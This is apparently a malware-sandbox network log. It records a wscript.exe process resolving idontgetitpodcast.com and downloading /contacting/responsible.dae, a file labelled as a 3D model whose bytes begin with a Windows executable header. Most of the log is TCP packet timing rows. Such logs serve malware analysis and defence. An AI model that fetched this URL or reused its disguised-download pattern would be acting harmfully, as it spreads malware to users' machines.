                  Jun 23, 2022 23:14:27.999424934 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.003988028 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.004017115 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.104716063 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.104902029 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.136472940 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.136519909 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.136766911 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.236967087 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.608150959 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.648509026 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668175936 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668216944 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668226004 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668258905 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668281078 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668292999 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668385029 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.668420076 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668438911 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668448925 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668457031 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.668463945 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668472052 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.668494940 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668504000 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668519974 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.668523073 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.668589115 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692348003 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692365885 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692404985 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692420959 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692452908 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692493916 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692526102 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692543983 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692600965 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692625999 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692651033 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692662954 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692712069 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692754030 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692773104 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692812920 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692825079 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.692850113 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.692877054 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717469931 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717513084 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717575073 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717598915 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717644930 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717675924 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717690945 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717720985 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717755079 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717766047 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717811108 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717852116 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.717968941 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.717994928 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718039989 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718055964 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718090057 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718126059 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718132973 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718143940 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718168974 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718184948 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718238115 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718249083 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718302011 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718319893 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718328953 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718343019 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718394995 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718456984 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718529940 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718585968 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718595028 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.718607903 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.718686104 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.720458031 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.742919922 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.742964029 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.743072033 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.743115902 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.743145943 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.743165970 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.743221045 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.744720936 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.744760990 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.744872093 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.744906902 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.744935036 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.744982958 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.744998932 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745058060 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745076895 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745204926 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745256901 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745275021 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745294094 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745335102 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745429039 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745466948 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745486975 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745497942 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745523930 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745660067 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745707989 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745729923 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745743990 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745769024 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745798111 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745822906 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745860100 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745874882 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745898008 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745914936 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745939970 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.745970011 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.745985031 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746004105 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.746025085 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746047020 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746078014 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.746089935 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746114016 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.746133089 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746156931 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746187925 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.746201992 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746220112 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746237993 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.746246099 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746284008 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.746298075 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.746329069 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.754628897 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.772733927 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.772778988 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.772880077 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.772933006 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.772957087 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.772984982 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773010015 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773019075 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773040056 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773083925 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773092985 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773112059 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773130894 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773137093 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773144960 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773179054 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773194075 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773210049 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773241043 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773248911 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773271084 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773288012 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773293972 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773300886 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773339987 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773350954 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773367882 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773396015 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773402929 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773428917 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773447037 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773452044 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773464918 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773499012 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773525000 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773536921 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773545027 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773555040 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773571968 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773616076 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773617983 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773631096 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773657084 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773691893 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773698092 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773709059 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773731947 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773741007 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773772955 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773772955 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773787022 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773809910 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773829937 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773854017 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773888111 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773889065 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773901939 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773933887 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.773977995 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.773988962 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774010897 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774035931 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.774043083 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774130106 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.774137974 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774149895 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774159908 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774226904 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.774234056 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774276018 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.774281025 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.774364948 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.788021088 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.796245098 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.796277046 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.796410084 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.796435118 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.796489954 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.796710014 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.796732903 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.796802044 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.796809912 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.796855927 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.796984911 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797005892 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797055006 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.797063112 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797105074 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.797310114 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797334909 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797419071 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.797427893 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797472954 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.797574043 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797593117 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797646046 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.797656059 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797859907 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.797863960 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797880888 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.797921896 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798180103 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798219919 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.798228979 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798250914 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.798307896 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.798449039 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798470020 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798522949 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.798531055 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798727036 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798748970 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798799992 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.798808098 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.798849106 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.799017906 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799040079 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799115896 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.799124956 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799261093 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.799392939 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799416065 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799472094 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.799479961 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799623966 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.799707890 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799730062 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.799793005 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.799801111 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.800668955 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.801048994 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912094116 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912127018 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912225962 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912312031 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912345886 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912373066 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912386894 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912395954 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912411928 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912460089 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912470102 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912513971 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912554979 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912744999 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912769079 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912813902 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912822962 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912862062 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.912966013 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.912985086 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913028002 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913045883 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913062096 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913079977 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913091898 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913147926 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913152933 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913182020 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913213968 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913233995 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913247108 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913254023 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913290024 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913312912 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913322926 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913332939 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.913383007 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.913433075 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.932009935 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.937517881 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.937608004 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.937635899 CEST44349746104.244.73.88192.168.2.4
                  Jun 23, 2022 23:14:28.937691927 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.937740088 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.939912081 CEST49746443192.168.2.4104.244.73.88
                  Jun 23, 2022 23:14:28.939938068 CEST44349746104.244.73.88192.168.2.4
                  TimestampSource PortDest PortSource IPDest IP
                  Jun 23, 2022 23:14:27.930609941 CEST6050653192.168.2.48.8.8.8
                  Jun 23, 2022 23:14:27.985476971 CEST53605068.8.8.8192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jun 23, 2022 23:14:27.930609941 CEST192.168.2.48.8.8.80x90caStandard query (0)idontgetitpodcast.comA (IP address)IN (0x0001)
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jun 23, 2022 23:14:27.985476971 CEST8.8.8.8192.168.2.40x90caNo error (0)idontgetitpodcast.com104.244.73.88A (IP address)IN (0x0001)
                  • idontgetitpodcast.com
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449746104.244.73.88443C:\Windows\System32\wscript.exe
                  TimestampkBytes transferredDirectionData
                  2022-06-23 21:14:28 UTC0OUTGET /contacting/responsible.dae HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Language: en-US
                  User-Agent: Logicool TouchPad
                  Host: idontgetitpodcast.com
                  2022-06-23 21:14:28 UTC0INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Thu, 23 Jun 2022 21:14:28 GMT
                  Content-Type: model/vnd.collada+xml
                  Content-Length: 1043968
                  Connection: close
                  Last-Modified: Thu, 23 Jun 2022 16:37:26 GMT
                  ETag: "fee00-5e220119ebd80"
                  Accept-Ranges: bytes
                  2022-06-23 21:14:28 UTC0INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZP@!L!This program must be run under Win32$7
